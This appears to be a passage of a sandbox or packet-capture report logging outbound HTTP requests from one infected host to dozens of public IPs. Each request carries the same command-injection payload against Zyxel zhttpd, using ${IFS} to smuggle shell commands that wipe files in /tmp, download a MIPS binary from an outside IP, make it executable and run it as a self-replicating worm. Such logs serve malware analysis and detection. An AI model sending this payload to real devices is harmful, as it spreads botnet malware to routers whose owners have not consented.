                                                Jan 12, 2024 18:24:33.789107084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3907192.168.2.1355412198.38.199.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789145947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3908192.168.2.133595238.168.157.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789176941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3909192.168.2.1339126165.187.230.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789201975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3910192.168.2.133944448.24.220.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789246082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3911192.168.2.135017480.132.16.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789257050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3912192.168.2.1356912176.244.90.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789314985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3913192.168.2.1347626106.123.227.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789360046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3914192.168.2.1355636186.147.177.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789396048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3915192.168.2.1338802203.153.225.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789419889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3916192.168.2.134808637.166.20.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789448023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3917192.168.2.135736662.167.64.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789494991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3918192.168.2.1348168130.30.118.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789516926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3919192.168.2.1336800176.27.173.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789540052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3920192.168.2.1347056163.107.0.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789602041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3921192.168.2.134593436.140.70.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789640903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3922192.168.2.1345284220.44.144.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789669037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3923192.168.2.1356708191.93.27.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789700985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3924192.168.2.1346968210.51.204.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789740086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3925192.168.2.1338322143.190.148.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789804935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3926192.168.2.1341278118.177.202.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789832115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3927192.168.2.135490468.102.120.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789856911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3928192.168.2.134740413.218.206.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789901018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3929192.168.2.134404837.2.130.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789946079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3930192.168.2.1342656124.45.44.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789982080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3931192.168.2.135688286.184.151.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790052891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3932192.168.2.1343406175.169.181.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790101051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3933192.168.2.136015464.189.16.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790138960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3934192.168.2.135164096.234.235.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790169001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3935192.168.2.133912231.152.248.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790230036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3936192.168.2.134582648.130.137.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790241003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3937192.168.2.135085268.229.83.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790313005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3938192.168.2.133737444.200.174.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790361881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3939192.168.2.134486242.82.241.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790390968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3940192.168.2.1338378162.38.224.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790441036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3941192.168.2.134698649.84.254.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790479898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3942192.168.2.133434454.105.232.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790522099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3943192.168.2.133352879.169.204.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790565014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3944192.168.2.133843465.144.220.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790601015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3945192.168.2.133295890.32.64.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790637016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3946192.168.2.1357834142.148.26.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790661097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3947192.168.2.136003283.123.126.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790716887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3948192.168.2.1333436118.101.68.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790746927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3949192.168.2.135427238.230.172.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790796995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3950192.168.2.1338974132.154.138.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790838003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3951192.168.2.1358364208.240.37.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790884972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3952192.168.2.1353764204.205.226.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790935040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3953192.168.2.1355430206.101.221.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.790971994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3954192.168.2.1340500200.199.118.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791012049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3955192.168.2.1333498129.234.29.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791064024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3956192.168.2.1348024104.160.120.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791115046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3957192.168.2.133322052.129.6.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791166067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3958192.168.2.133657697.22.90.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791193008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3959192.168.2.135311271.42.159.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791254044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3960192.168.2.134682213.248.11.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791274071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3961192.168.2.135209413.243.31.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791309118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3962192.168.2.134432679.195.151.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791376114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3963192.168.2.1356168172.6.55.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791404009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3964192.168.2.134409887.44.127.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791460037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3965192.168.2.1334544123.54.1.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791512012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3966192.168.2.134779825.175.21.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791536093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3967192.168.2.1344680194.38.192.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791600943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3968192.168.2.1360954117.199.36.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791636944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3969192.168.2.1354850128.20.50.137443
                                                TimestampBytes transferredDirectionData
